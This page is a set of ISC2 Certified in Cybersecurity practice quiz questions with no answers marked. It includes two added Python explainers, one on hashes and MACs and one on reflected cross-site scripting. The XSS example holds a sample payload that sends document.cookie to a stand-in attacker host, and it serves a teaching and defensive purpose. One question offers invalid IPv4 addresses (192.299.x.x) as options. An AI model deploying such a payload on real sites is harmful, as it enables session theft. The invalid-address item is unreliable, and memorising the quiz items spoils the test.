ISC 2 CC | 205 questions
Test title: ISC 2 CC | 205 questions
Description: Questions to answer
- The address 8be2:4382:8d84:7ce2:ec0f:3908:d29a:903a is an: (a) Web address (b) IPv4 address (c) IPv6 address (d) MAC address
- Which of the following canons is found in the ISC2 code of ethics? (a) Advance and promote the profession (b) Protect society, the common good, and the infrastructure (c) Provide diligent and competent service to principals (d) Act honorably, honestly, safely and legally
- Which of the following is NOT an ethical canon of the ISC2? (a) Advance and protect the profession (b) Protect society, the common good, necessary public trust and confidence, and the infrastructure (c) Act honorably, honestly, justly, responsibly and legally (d) Provide active and qualified service to principal
- The cloud deployment model where a company has resources on-premise and in the cloud is known as: (a) Hybrid cloud (b) Multi-tenant (c) Private cloud (d) Community cloud
- Which of the following is a public IP? (a) 13.16.123.1 (b) 192.168.123.1 (c) 172.16.123.1 (d) 10.221.123.1
- Which of the following is a data handling policy procedure? (a) Transform (b) Collect (c) Encode (d) Destroy
- Which devices would be more effective in detecting an intrusion into a network? (a) Routers (b) HIDS (c) Firewalls (d) NIDS
- Which concept describes an information security strategy that integrates people, technology and operations in order to establish security controls across multiple layers of the organization? (a) Least Privilege (b) Defense in Depth (c) Separation of Duties (d) Privileged Accounts
- Which access control is more effective at protecting a door against unauthorized access? (a) Fences (b) Turnstiles (c) Barriers (d) Locks
- Which of the following is a detection control? (a) Turnstiles (b) Smoke sensors (c) Bollards (d) Firewalls
- Which type of attack has the PRIMARY objective of controlling the system from outside? (a) Backdoors (b) Rootkits (c) Cross-Site Scripting (d) Trojans
- Which of the following is not a protocol of OSI Layer 3? (a) SNMP (b) ICMP (c) IGMP (d) IP
- When a company hires an insurance company to mitigate risk, which risk management technique is being applied? (a) Risk avoidance (b) Risk transfer (c) Risk mitigation (d) Risk tolerance
- The SMTP protocol operates at OSI Layer: (a) 7 (b) 25 (c) 3 (d) 23
- The process of verifying or proving the user's identification is known as: (a) Confidentiality (b) Integrity (c) Authentication (d) Authorization
- If an organization wants to protect itself against tailgating, which of the following types of access control would be most effective? (a) Locks (b) Fences (c) Barriers (d) Turnstiles
- Logging and monitoring systems are essential to: (a) Identifying inefficient performing systems, preventing compromises, and providing a record of how systems are used (b) Identifying efficient performing systems, labeling compromises, and providing a record of how systems are used (c) Identifying inefficient performing systems, detecting compromises, and providing a record of how systems are used (d) Identifying efficient performing systems, detecting compromises, and providing a record of how systems are used
- In the event of a disaster, which of these should be the PRIMARY objective? (★) (a) Guarantee the safety of people (b) Guarantee the continuity of critical systems (c) Protection of the production database (d) Application of disaster communication
- The process that ensures that system changes do not adversely impact business operations is known as: (a) Change Management (b) Vulnerability Management (c) Configuration Management (d) Inventory Management
- The last phase in the data security cycle is: (a) Encryption (b) Backup (c) Archival (d) Destruction
- Which access control model specifies access to an object based on the subject's role in the organization? (a) RBAC (b) MAC (c) DAC (d) ABAC
- Which of the following is NOT an example of a physical security control? (a) Firewalls (b) Biometric access controls (c) Remote control electronic locks (d) Security cameras
- Which type of attack will most effectively maintain remote access and control over the victim's computer? (a) Trojans (b) Phishing (c) Cross-Site Scripting (d) Rootkits
- In incident terminology, the meaning of Zero Day is: (a) Days to solve a previously unknown system vulnerability (b) A previously unknown system vulnerability (c) Days without a cybersecurity incident (d) Days with a cybersecurity incident
- Which of the following is NOT a possible model for an Incident Response Team (IRT)? (a) Leveraged (b) Pre-existing (c) Dedicated (d) Hybrid
- A device found not to comply with the security baseline should be: (a) Disabled or separated into a quarantine area until a virus scan can be run (b) Disabled or isolated into a quarantine area until it can be checked and updated (c) Placed in a demilitarized zone (DMZ) until it can be reviewed and updated (d) Marked as potentially vulnerable and placed in a quarantine area
- A biometric reader that grants access to a computer system in a data center is a: (a) Administrative Control (b) Physical Control (c) Authorization Control (d) Technical Control
- Which type of attack PRIMARILY aims to make a resource inaccessible to its intended users? (a) Denial of Service (b) Phishing (c) Trojans (d) Cross-Site Scripting
- Which type of attack embeds a malicious payload inside reputable or trusted software? (a) Trojans (b) Phishing (c) Rootkits (d) Cross-Site Scripting
- Which tool is commonly used to sniff network traffic? (★) (a) Burp Suite (b) John the Ripper (c) Wireshark (d) Nslookup
- Which of these is not an attack against an IP network? (a) Side-channel Attack (b) Man-in-the-middle Attack (c) Fragmented Packet Attack (d) Oversized Packet Attack
- The detailed steps to complete tasks supporting departmental or organizational policies are typically documented in: (a) Regulations (b) Standards (c) Policies (d) Procedures
- Which device is used to connect a LAN to the Internet? (a) SIEM (b) HIDS (c) Router (d) Firewall
- What does SIEM mean? (a) Security Information and Enterprise Manager (b) Security Information and Event Manager (c) System Information and Enterprise Manager (d) System Information and Event Manager
- A security safeguard is the same as a: (a) Safety control (b) Privacy control (c) Security control (d) Security principle
- Which access control model can grant access to a given object based on complex rules? (a) DAC (b) ABAC (c) RBAC (d) MAC
- Which port is used to secure communication over the web (HTTPS)? (a) 69 (b) 80 (c) 25 (d) 443
- Which of these has the PRIMARY objective of identifying and prioritizing critical business processes? (a) Business Impact Plan (b) Business Impact Analysis (c) Disaster Recovery Plan (d) Business Continuity Plan
- Which of the following are NOT types of security controls? (a) Common controls (b) Hybrid controls (c) System-specific controls (d) Storage controls
- Which of the following is NOT a type of learning activity used in Security Awareness? (a) Awareness (b) Training (c) Education (d) Tutorial
- The magnitude of the harm expected as a result of the consequences of an unauthorized disclosure, modification, destruction, or loss of information is known as the: (a) Vulnerability (b) Threat (c) Impact (d) Likelihood
- The implementation of security controls is a form of: (a) Risk reduction (b) Risk acceptance (c) Risk avoidance (d) Risk transference
- Which of the following attacks takes advantage of poor input validation in websites? (a) Trojans (b) Cross-Site Scripting (c) Phishing (d) Rootkits
- Which of the following is an example of an administrative security control? (a) Access Control Lists (b) Acceptable Use Policies (c) Badge Readers (d) No entry signs
- In Change Management, which component addresses the procedures needed to undo changes? (a) Request for Approval (b) Request for Change (c) Rollback (d) Disaster and Recovery
- Which of the following properties is NOT guaranteed by digital signatures? (a) Authentication (b) Confidentiality (c) Non-Repudiation (d) Integrity
- Which devices have the PRIMARY objective of collecting and analyzing security events? (a) Hubs (b) Firewalls (c) Routers (d) SIEM
- What is an effective way of hardening a system? (a) Patch the system (b) Have an IDS in place (c) Run a vulnerability scan (d) Create a DMZ for web application services
- Which type of key can be used to both encrypt and decrypt the same message? (a) A public key (b) A private key (c) An asymmetric key (d) A symmetric key
- Which regulation addresses data protection and privacy in Europe? (a) SOX (b) HIPAA (c) FISMA (d) GDPR
- Which of the following types of devices inspect packet header information to either allow or deny network traffic? (a) Hubs (b) Firewalls (c) Routers (d) Switches
- A web server that accepts requests from external clients should be placed in which network? (a) Intranet (b) DMZ (c) Internal Network (d) VPN
- Sensitivity is a measure of the …: (a) … protection and timeliness assigned to information by its owner, or the purpose of representing its need for urgency (b) … urgency and protection assigned to information by its owner (c) … importance assigned to information by its owner, or the purpose of representing its need for protection (d) … pertinence assigned to information by its owner, or the purpose of representing its need for urgency
- How many data labels are considered good practice? (a) 2-3 (b) 1 (c) 1-2 (d) >4
- Security posters are an element PRIMARILY employed in: (★) (a) Security Awareness (b) Incident Response Plans (c) Business Continuity Plans (d) Physical Security Controls
- Which of these types of user is LESS likely to have a privileged account? (a) System Administrator (b) Security Analyst (c) Help Desk (d) External Worker
- Which of the following is NOT an element of System Security Configuration Management? (a) Inventory (b) Baselines (c) Updates (d) Audit logs
- Which are the components of an incident response plan? (a) Preparation -> Detection and Analysis -> Recovery -> Containment -> Eradication -> Post-Incident Activity (b) Preparation -> Detection and Analysis -> Containment -> Eradication -> Post-Incident Activity -> Recovery (c) Preparation -> Detection and Analysis -> Eradication -> Recovery -> Containment -> Post-Incident Activity (d) Preparation -> Detection and Analysis -> Containment, Eradication and Recovery -> Post-Incident Activity
- Which of the following is an example of 2FA? (a) Badges (b) Passwords (c) Keys (d) One-Time Passwords (OTP)
- The predetermined set of instructions or procedures to sustain business operations after a disaster is commonly known as: (a) Business Impact Analysis (b) Disaster Recovery Plan (c) Business Impact Plan (d) Business Continuity Plan
- Which of the following is NOT a feature of a cryptographic hash function? (a) Reversible (b) Unique (c) Deterministic (d) Useful
- Which are the three packets used in the TCP connection handshake? (★) (a) Offer → Request → ACK (b) SYN → SYN/ACK → ACK (c) SYN → ACK → FIN (d) Discover → Offer → Request
- After an earthquake disrupting business operations, which document contains the procedures required to return business to normal operation? (a) The Business Impact Plan (b) The Business Impact Analysis (c) The Business Continuity Plan (d) The Disaster Recovery Plan
- What is the consequence of a Denial of Service attack? (a) Exhaustion of device resources (b) Malware infection (c) Increase in the availability of resources (d) Remote control of a device
- According to ISC2, which are the six phases of data handling? (a) Create -> Use -> Store -> Share -> Archive -> Destroy (b) Create -> Store -> Use -> Share -> Archive -> Destroy (c) Create -> Share -> Use -> Store -> Archive -> Destroy (d) Create -> Share -> Store -> Use -> Archive -> Destroy
- Which of the following is less likely to be part of an incident response team? (a) Legal representatives (b) Human Resources (c) Representatives of senior management (d) Information security professionals
- Which of these tools is commonly used to crack passwords? (★) (a) Burp Suite (b) Nslookup (c) John the Ripper (d) Wireshark
- In order to find out whether personal tablet devices are allowed in the office, which of the following policies would be helpful to read? (a) BYOD (b) Privacy Policy (c) Change Management Policy (d) AUP
- In which cloud deployment model do companies share resources and infrastructure on the cloud? (a) Hybrid cloud (b) Multi-tenant (c) Private cloud (d) Community cloud
- Which of these is the PRIMARY objective of a Disaster Recovery Plan? (a) Restore company operation to the last-known reliable operation state (b) Outline a safe escape procedure for the organization's personnel (c) Maintain crucial company operations in the event of a disaster (d) Communicate to the responsible entities the damage caused to operations in the event of a disaster
- An entity that acts to exploit a target organization's system vulnerabilities is a: (a) Threat Vector (b) Threat Actor (c) Threat (d) Attacker
- A best practice of patch management is to: (a) Apply all patches as quickly as possible (b) Test patches before applying them (c) Apply patches every Wednesday (d) Apply patches according to the vendor's reputation
- Which of these would be the best option if a network administrator needs to control access to a network? (a) HIDS (b) IDS (c) SIEM (d) NAC
- Which of these is NOT a change management component? (a) Approval (b) RFC (c) Rollback (d) Governance
- Which of the following is NOT a social engineering technique? (a) Pretexting (b) Quid pro quo (c) Double-dealing (d) Baiting
- If there is no time constraint, which protocol should be employed to establish a reliable connection between two devices? (a) TCP (b) DHCP (c) SNMP (d) UDP
- An exploitable weakness or flaw in a system or component is a: (a) Threat (b) Bug (c) Vulnerability (d) Risk
- In which cloud model does the cloud customer have LESS responsibility over the infrastructure? (★) (a) IaaS (b) FaaS (c) PaaS (d) SaaS
- Risk Management is: (a) The assessment of the potential impact of a threat (b) The creation of an incident response team (c) The impact and likelihood of a threat (d) The identification, evaluation and prioritization of risks
- Which of the following documents contains elements that are NOT mandatory? (a) Policies (b) Guidelines (c) Regulations (d) Procedures
- In which of the following phases of an Incident Response Plan are incident responses prioritized? (a) Post-incident Activity (b) Detection and Analysis (c) Preparation (d) Containment, Eradication, and Recovery
- Which security principle states that a user should only have the necessary permission to execute a task? (a) Privileged Accounts (b) Separation of Duties (c) Least Privilege (d) Defense in Depth
- The Bell and LaPadula access control model is a form of: (★) (a) ABAC (b) RBAC (c) MAC (d) DAC
- In risk management, the highest priority is given to a risk where: (a) The frequency of occurrence is low, and the expected impact value is high (b) The expected probability of occurrence is low, and the potential impact is low (c) The expected probability of occurrence is high, and the potential impact is low (d) The frequency of occurrence is high, and the expected impact value is low
- Which of the following areas is connected to PII? (a) Non-Repudiation (b) Authentication (c) Integrity (d) Confidentiality
- According to the canon "Provide diligent and competent service to principals", ISC2 professionals are to: (a) Take care not to tarnish the reputation of other professionals through malice or indifference (b) Treat all members fairly and, when resolving conflicts, consider public safety and duties to principals, individuals and the profession, in that order (c) Avoid apparent or actual conflicts of interest (d) Promote the understanding and acceptance of prudent information security measures
- Malicious emails that aim to attack company executives are an example of: (a) Trojans (b) Whaling (c) Phishing (d) Rootkits
- Governments can impose financial penalties as a consequence of breaking a: (a) Regulation (b) Standard (c) Policy (d) Procedure
- Which type of attack attempts to trick the user into revealing personal information by sending a fraudulent message? (a) Phishing (b) Cross-Site Scripting (c) Denial of Service (d) Trojans
- In which of the following access control models can the creator of an object delegate permission? (a) ABAC (b) MAC (c) RBAC (d) DAC
- Which type of attack has the PRIMARY objective of encrypting devices and their data, and then demanding a ransom payment for the decryption key? (a) Ransomware (b) Trojan (c) Cross-Site Scripting (d) Phishing
- Which of the following cloud models allows access to fundamental computing resources? (★) (a) SaaS (b) FaaS (c) PaaS (d) IaaS
- How many layers does the OSI model have? (a) 7 (b) 4 (c) 6 (d) 5
- Which of the following principles aims primarily at fraud detection? (a) Privileged Accounts (b) Defense in Depth (c) Least Privilege (d) Separation of Duties
- Which protocol uses a three-way handshake to establish a reliable connection? (a) TCP (b) SMTP (c) UDP (d) SNMP
- Which of the following is an example of a technical security control? (a) Access control lists (b) Turnstiles (c) Fences (d) Bollards
- Which type of attack attempts to gain information by observing the device's power consumption? (★) (a) Side Channels (b) Trojans (c) Cross-Site Scripting (d) Denial of Service
- Which of the following areas is the most distinctive property of PHI? (a) Integrity (b) Confidentiality (c) Non-Repudiation (d) Authentication
- Which of these is the most efficient and effective way to test a business continuity plan? (a) Simulations (b) Walkthroughs (c) Reviews (d) Discussions
- Which of the following cybersecurity concepts guarantees that information is accessible only to those authorized to access it? (a) Confidentiality (b) Non-repudiation (c) Authentication (d) Accessibility
- In the event of a disaster, what should be the PRIMARY objective? (★) (a) Apply disaster communication (b) Protect the production database (c) Guarantee the safety of people (d) Guarantee the continuity of critical systems
- A security professional should report violations of a company's security policy to: (a) The ISC2 Ethics Committee (b) Company management (c) National authorities (d) A court of law
- Which department in a company is NOT regularly involved in a DRP? (a) Executives (b) IT (c) Public Relations (d) Financial
- Which of the following is included in an SLA document? (a) A plan to prepare the organization for the continuation of critical business functions (b) A plan to keep business operations going while recovering from a significant disruption (c) Instructions to detect, respond to, and limit the consequences of a cyber-attack (d) Instructions on data ownership and destruction
- What is the most important difference between MAC and DAC? (a) In MAC, security administrators set the roles for the users; in DAC, roles are set at the object owner's discretion (b) In MAC, security administrators assign access permissions; in DAC, security administrators set user roles (c) In MAC, security administrators assign access permissions; in DAC, access permissions are set at the object owner's discretion (d) In MAC, access permissions are set at the object owner's discretion; in DAC, it is up to security administrators to assign access permissions
- Requiring a specific user role to access resources is an example of: (a) MAC (b) ABAC (c) RBAC (d) DAC
- Which type of document outlines the procedures ensuring that vital company systems keep running during business-disrupting events? (a) Business Impact Plan (b) Business Impact Analysis (c) Disaster Recovery Plan (d) Business Continuity Plan
- Which of the following is NOT a best practice in access management? (a) Give only the right amount of permission (b) Periodically assess if user permissions still apply (c) Request a justification when upgrading permission (d) Trust but verify
- If a company collects PII, which policy is required? (a) Remote Access Policy (b) GDPR (c) Privacy Policy (d) Acceptable Use Policy
- Which of these is LEAST likely to be installed by an infection? (a) Logic Bomb (b) Keylogger (c) Trojan (d) Backdoor
- (★) The best defense method to stop a 'Replay Attack' is to: (a) Use an IPSec VPN (b) Use a Firewall (c) Use password authentication (d) Use message digesting
- Which of these devices has the PRIMARY objective of determining the most efficient path for traffic to flow across networks? (a) Hubs (b) Firewalls (c) Routers (d) Switches
- Which of these types of malware self-replicates without the need for human intervention? (a) Worm (b) Trojan (c) Virus (d) Rootkits
- As an (ISC)² member, you are expected to perform with due care. What does 'due care' specifically mean? (a) Do what is right in each situation you encounter on the job (b) Give continuity to the legacy of security practices of your company (c) Apply patches annually (d) Researching and acquiring the knowledge to do your job right
- (★) Which of these is NOT a best practice in access management? (a) Periodically assessing whether user permissions still apply (b) Requesting a justification when upgrading permission (c) Giving only the right amount of permission (d) Trust but verify
- During the investigation of an incident, which security policies are more likely to cause difficulties? (a) Configuration standards (b) Incident response policies (c) Communication policies (d) Retention policies
- In an Access Control List (ACL), the element that determines which permissions you have is: (a) The subject (b) The object (c) The firmware (d) The rule
- What does the term 'data remanence' refer to? (a) Data in use that can't be encrypted (b) Files saved locally that can't be remotely accessed (c) Data left over after routine removal and deletion (d) All of the data in a system
- (★) Which type of recovery site has some or most systems in place, but does not have the data needed to take over operations? (a) A hot site (b) A cloud site (c) A warm site (d) A cold site
- Which of these is NOT a characteristic of an MSP implementation? (a) Manage all in-house company infrastructure (b) Monitor and respond to security incidents (c) Mediate, execute and decide top-level decisions (d) Utilize expertise for the implementation of a product or service
- Which of these is NOT a typical component of a comprehensive business continuity plan (BCP)? (a) A cost prediction of the immediate response procedures (b) Immediate response procedures and checklists (c) Notification systems and call trees for alerting personnel (d) A list of the BCP team members
- Acting ethically is mandatory for (ISC)² members. Which of these is NOT considered unethical? (a) Disrupting the intended use of the internet (b) Seeking to gain unauthorized access to resources on the internet (c) Compromising the privacy of users (d) Having fake social media profiles and accounts
- In an incident response process, which phase uses indicators of compromise and log analysis as part of a review of events? (a) Preparation (b) Eradication (c) Identification (d) Containment
- Which of these access control systems is commonly used in the military? (a) ABAC (b) DAC (c) RBAC (d) MAC
- Which of these is NOT a security principle? (a) Security in Depth (SID) (b) Zero Trust model (c) Least Privilege (d) Separation of Duties
- Which of these is not a common goal of a cybersecurity attacker? (a) Allocation (b) Alteration (c) Disclosure (d) Denial
- Which of these layers is NOT part of the TCP/IP model? (a) Application (b) Physical (c) Internet (d) Transport
- In a BYOD model, which of these technologies is best suited to keep corporate data and applications separate from personal ones? (a) Biometrics (b) Full-device encryption (c) Context-aware authentication (d) Containerization
- In the context of risk management, which information does ALE outline? (a) The expected cost per year of not performing a given risk-mitigating action (b) The business impact of a risk (c) The percentage of Asset Lost Efficiency (d) The probability of a risk coming to pass in a given year
- Which of these techniques is PRIMARILY used to ensure data integrity? (a) Message Digest (b) Content Encryption (c) Backups (d) Hashing
- Which of these is an example of a privacy breach? (a) Any observable occurrence in a network or system (b) Being exposed to the possibility of attack (c) Unavailability of critical systems (d) Access of private information by an unauthorized person
- Which of these terms refers to a collection of fixes? (a) Downgrade (b) Patch (c) Service Pack (d) Hotfix
- While performing background checks on new employees, which of these can NEVER be an attribute for discrimination? (a) Employment history, references, criminal records (b) Credit history, employment history, references (c) Criminal records, credit history, references (d) References, education, political affiliation, employment history
- When looking for cybersecurity insurance, which of these is the MOST IMPORTANT objective? (a) Risk acceptance (b) Risk transference (c) Risk avoidance (d) Risk spreading
- Which of these documents is MORE directly related to what can be done with a system or with its information? (a) SLA (b) MOA (c) MOU (d) ROE
- Which kind of document outlines the procedures ensuring that vital company systems keep running during business-disrupting events? (a) Business Impact Analysis (b) Business Impact Plan (c) Business Continuity Plan (d) Disaster Recovery Plan
- Which of these social engineering attacks sends emails that target specific individuals? (a) Pharming (b) Whaling (c) Vishing (d) Spear phishing
- (★) Which of these properties is NOT guaranteed by a Message Authentication Code (MAC)? (a) Authenticity (b) Anonymity (c) Integrity (d) Non-repudiation
- What is the PRIMARY objective of degaussing? (a) Preventing magnetic side-channel attacks (b) Reducing noisy data on a disk (c) Erasing the data on a disk (d) Retaining the data on a disk
- Which of these is part of the canons of the (ISC)² code of ethics? (a) Provide diligent and competent services to stakeholders (b) Advance and protect the profession (c) Prevent and detect unauthorized use of digital assets in a society (d) Act always in the best interest of your client
- Which of these is NOT one of the (ISC)² ethics canons? (a) Act honorably, honestly, justly, responsibly, and legally (b) Consider the social consequences of the systems you are designing (c) Protect society, the common good, necessary public trust and confidence, and the infrastructure (d) Provide diligent and competent service to principals
- (★) Which of these is the PRIMARY objective of the PCI-DSS standard? (a) Personally Identifiable Information (PII) (b) Change Management (c) Secure Credit Card Payments (d) Protected Health Information (PHI)
- Which of these is an attack that encrypts the organization's information, and then demands payment for the decryption code? (a) Phishing (b) DDoS (c) Spoofing (d) Ransomware
- The PRIMARY objective of a business continuity plan is: (a) To regularly verify whether the organization complies with applicable regulations (b) To sustain business operations while recovering from a disruption (c) To assess the impact of disruption to the business (d) To restore the business to the full last-known reliable state of operations
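Several of the questions above turn on the same small set of facts: a cryptographic hash is deterministic and not reversible, a hash or message digest protects integrity, a shared-key Message Authentication Code adds authenticity but cannot give non-repudiation (both parties hold the key, so either could have produced the tag), and a digest or MAC by itself does not stop a replay because the resent bytes verify just as well. The block below is an added example written for this page, not code from the quiz or from ISC2; it uses only Python's hashlib and hmac, and the key, messages and the counter-based framing are constructed for illustration. A digital signature is not shown because the standard library has no asymmetric primitive; the property it adds over a MAC is exactly that only the private-key holder can produce a valid signature, which is what makes non-repudiation possible.

```python
"""Hash vs. MAC: which security properties each one actually provides.

Added example (not from the quiz). Standard library only; the key, the
messages and the counter-based framing below are constructed for illustration.
"""
import hashlib
import hmac
import secrets


def sha256_hex(data: bytes) -> str:
    """Plain digest: deterministic and fixed-length, but not reversible."""
    return hashlib.sha256(data).hexdigest()


def differing_bits(hex_a: str, hex_b: str) -> int:
    """Bit distance between two digests; shows the avalanche effect of a tiny edit."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def mac_tag(key: bytes, message: bytes) -> bytes:
    """HMAC-SHA256 tag: proves the message came from someone holding `key`."""
    return hmac.new(key, message, hashlib.sha256).digest()


def mac_verify(key: bytes, message: bytes, tag: bytes) -> bool:
    """Constant-time comparison; a plain == on tags leaks timing information."""
    return hmac.compare_digest(mac_tag(key, message), tag)


def receiver_can_forge(key: bytes, message: bytes, sender_tag: bytes) -> bool:
    """Why a MAC gives integrity and authenticity but NOT non-repudiation:
    the receiver holds the same key, so the tag it computes is byte-identical
    to the sender's and a third party cannot tell which side produced it."""
    return mac_tag(key, message) == sender_tag


class ReplayGuard:
    """A tag alone still verifies when the same bytes are resent. Binding a
    monotonic counter into the authenticated data lets the receiver reject
    anything it has already accepted (constructed framing, not a standard)."""

    def __init__(self, key: bytes) -> None:
        self.key = key
        self.highest_seen = -1

    @staticmethod
    def frame(counter: int, body: bytes) -> bytes:
        return counter.to_bytes(8, "big") + body

    def accept(self, counter: int, body: bytes, tag: bytes) -> bool:
        if not mac_verify(self.key, self.frame(counter, body), tag):
            return False  # tampered body, wrong key, or tag copied from another frame
        if counter <= self.highest_seen:
            return False  # replayed or out of order
        self.highest_seen = counter
        return True


if __name__ == "__main__":
    key = secrets.token_bytes(32)  # constructed shared secret
    msg = b"transfer 100 to account 42"
    tag = mac_tag(key, msg)
    print("verify original :", mac_verify(key, msg, tag))
    print("verify tampered :", mac_verify(key, msg.replace(b"100", b"900"), tag))
    print("receiver forges :", receiver_can_forge(key, msg, tag))
    guard = ReplayGuard(key)
    t1 = mac_tag(key, ReplayGuard.frame(1, msg))
    print("first delivery  :", guard.accept(1, msg, t1))
    print("replayed        :", guard.accept(1, msg, t1))
    a, b = sha256_hex(b"hello"), sha256_hex(b"hellp")
    print("bits changed by a one-character edit:", differing_bits(a, b))
```

The `ReplayGuard` is the practitioner's caveat behind the replay-attack question: the digest or tag proves the bytes are unmodified and came from a key holder, but freshness has to come from something bound into the authenticated data (a counter, nonce or timestamp), which is what transport protections such as an IPsec VPN supply on the wire.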
- Which of these is an attack whose PRIMARY goal is to gain access to a target system through a falsified identity? (a) Ransomware (b) Amplification (c) Spoofing (d) DDoS
- When an incident occurs, which of these is not a PRIMARY responsibility of an organization's response team? (a) Determining the scope of the damage caused by the incident (b) Implementing the recovery procedures necessary to restore security and recover from any incident-related damage (c) Determining whether any confidential information has been compromised over the course of the entire incident (d) Communicating with top management regarding the circumstances of the cybersecurity event
- What is the PRIMARY objective of a rollback in the context of the change management process? (a) Identify the required changes needed (b) Validate the system change process (c) Restore the system to its last state before the change was made (d) Establish a minimum understood and acceptable level of security requirements
- Which of these entities is responsible for signing an organization's policies? (a) Human Resources (b) Security engineer (c) Financial Department (d) Senior management
- Which of these terms refers to threats with unusually high technical and operational sophistication, spanning months or even years? (a) Rootkit (b) APT (c) Side-channel (d) Ping of death
- The PRIMARY objective of a security baseline is to establish …: (a) a minimum understood and a good level of security requirements (b) a minimum understood and acceptable level of security requirements (c) security and configuration requirements (d) a maximum understood and an acceptable level of security requirements
- Which of these attacks takes advantage of inadequate input validation in websites? (a) Phishing (b) Trojans (c) Cross-Site Scripting (d) Rootkits
- An organization needs a network security tool that detects and acts in the event of malicious activity. Which of these tools will BEST meet their needs? (a) Router (b) IPS (c) IDS (d) Firewall
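The cross-site scripting questions describe the bug as "inadequate input validation", which is only half the story: the injection happens when untrusted input is written into HTML without encoding for the context it lands in, and validation is the second layer, not the first. The block below is an added example for this page, not code from the quiz; it models a search page that reflects the query back to the user, with the vulnerable and hardened renderers side by side. The payload, the template, the allow-list pattern and the `attacker.example` host are all constructed for illustration.

```python
"""Reflected XSS from untrusted input in HTML, and the two layers of defense.

Added example, not from the quiz. Models a search page that echoes the query
back to the user; the payload, template and allow-list are constructed.
"""
import html
import re
import urllib.parse

# Constructed attacker input: runs in the victim's browser if reflected raw.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

TEMPLATE = "<p>Results for: {}</p>"

# Allow-list for this one field: word characters, space and light punctuation.
_QUERY_OK = re.compile(r"^[\w .,'-]{1,100}$")


def render_vulnerable(query: str) -> str:
    """Untrusted text concatenated straight into markup: the attacker owns the page."""
    return TEMPLATE.format(query)


def render_hardened(query: str) -> str:
    """Output encoding for the HTML text context: < > & " ' become entities,
    so the browser shows the payload as text instead of parsing it as a tag."""
    return TEMPLATE.format(html.escape(query, quote=True))


def validate_query(query: str) -> bool:
    """Input validation is the second layer. It rejects obvious junk early but
    does not replace encoding: O'Brien must still be accepted and then escaped."""
    return bool(_QUERY_OK.fullmatch(query))


def safe_href(url: str) -> str:
    """Attribute context differs from text context: escaping cannot neutralise a
    javascript: URL, so the scheme is allow-listed before the value is escaped."""
    scheme = urllib.parse.urlparse(url).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def attack_url(base: str, payload: str = PAYLOAD) -> str:
    """What the phishing link carrying the payload would look like."""
    return base + "?q=" + urllib.parse.quote(payload, safe="")


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("hardened  :", render_hardened(PAYLOAD))
    print("validates :", validate_query(PAYLOAD), validate_query("cats and dogs"))
    print("href      :", safe_href("javascript:alert(1)"), safe_href("https://example.com/?a=1&b=2"))
    print("link      :", attack_url("https://shop.example/search"))
```

The `safe_href` function is the edge case worth remembering from this question: a web application vulnerability scanner will flag the reflected text sink, but a link built from user input needs a scheme allow-list on top of attribute encoding, because `javascript:` survives `html.escape` untouched.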
- In a DAC policy scenario, which of these tasks can only be performed by a subject granted access to information? (a) Changing security attributes (b) Reading the information (c) Executing the information (d) Modifying the information
- In the event of non-compliance, which of these can have considerable financial consequences for an organization? (a) Policies (b) Regulations (c) Guidelines (d) Standards
- What does the term LAN refer to? (a) A tool to manage and control network traffic, as well as to protect a network (b) A network in a building or limited geographical area (c) A device that connects multiple other devices in a network (d) A long-distance connection between geographically distant networks
- Which of these is a type of corrective security control? (a) Patches (b) Intrusion detection systems (c) Guidelines (d) Encryption
- Which of these enables point-to-point online communication over an untrusted network? (a) VLAN (b) Firewall (c) Router (d) VPN
- At which of the OSI layers do TCP and UDP work? (a) Transport Layer (b) Session Layer (c) Application Layer (d) Physical Layer
- (★) Which is the PRIMARY focus of the ISO 27002 standard? (a) Health Insurance Portability and Accountability Act (HIPAA) (b) Information Security Management System (ISMS) (c) Risk Management (d) Application Security
- (★) Which of these subnet masks will allow 30 hosts? (a) /26 (b) /30 (c) /27 (d) /29
- (★) Which of these statements about the security implications of IPv6 is NOT true? (a) Rules based on static IPv6 addresses may not work (b) IPv6's NAT implementation is insecure (c) IPv6 traffic may bypass existing security controls (d) IPv6 reputation services may not be mature and useful
- Which of these is a type of detective access control? (a) Bollards (b) Movement Sensors (c) Turnstiles (d) Firewalls
- The name, age, location and job title of a person are all examples of: (a) Biometric factors (b) Attributes (c) Account permissions (d) Identity factors
- Which cloud service model provides the most suitable environment for customers who want to install their custom operating system? (a) SaaS (b) SLA (c) IaaS (d) PaaS
- (★) Which of these statements is TRUE about cybersquatting? (a) It's an unethical practice but everyone does it (b) It is a partially illegal practice (c) It is an illegal practice (d) It is a legal practice
- Which of these addresses is commonly reserved specifically for broadcasting? (a) 192.299.121.254 (b) 192.299.121.0 (c) 192.299.121.14 (d) 192.299.121.255
- Which department in a company is NOT typically involved in a Disaster Recovery Plan (DRP)? (a) Executive (b) Financial (c) Public Relations (d) IT
- Which of these pairs does NOT constitute Multi-Factor Authentication (MFA)? (a) Fingerprint and password (b) Username and retina scan (c) Password and username (d) PIN and credit card
- Which method is COMMONLY used to map live hosts in the network? (a) Geolocation (b) Traceroute (c) Ping sweep (d) Wireshark
- A poster reminding of best password management practices is an example of which type of learning activity? (a) Awareness (b) Schooling (c) Education (d) Training
- Which part of the CIA Triad will be PRIMARILY jeopardized in a Distributed Denial of Service (DDoS) attack? (a) Accountability (b) Availability (c) Integrity (d) Confidentiality
- What technology is MOST LIKELY to conserve the storage space required for video recordings? (a) Motion detection (b) PTZ (c) Facial recognition (d) Infrared cameras
- An organization that uses a layered approach when designing its security architecture is using which of these security approaches? (a) Zero trust (b) Defense in depth (c) Network Layers (d) Network Control Access
- Which of these techniques will ensure the property of 'non-repudiation'? (a) Using a VPN (b) Passwords (c) Encryption (d) Digital signatures
- (★) A USB pen with data passed around the office is an example of: (a) Data in motion (b) Data at rest (c) Data in transit (d) Data in use
- Suppose that an organization wants to implement measures to strengthen its detective access controls. Which one of these tools should they implement? (a) Patches (b) Encryption (c) IDS (d) Backups
- (★) Which of these is an example of a MAC address? (a) 00-51-02-1F-58-F6 (b) 0051021f58 (c) 10.23.19.49 (d) 2001:db8:3333:4444:5555:6666:7777:8888
- Which of these types of credentials is NOT used in multi-factor authentication? (a) Something you have (b) Something you know (c) Something you are (d) Something you trust
- On an Incident Response team, which role acts as the team's main link to Senior Management? (a) Information security (b) Communications and public relations (c) Management (d) Technical expert
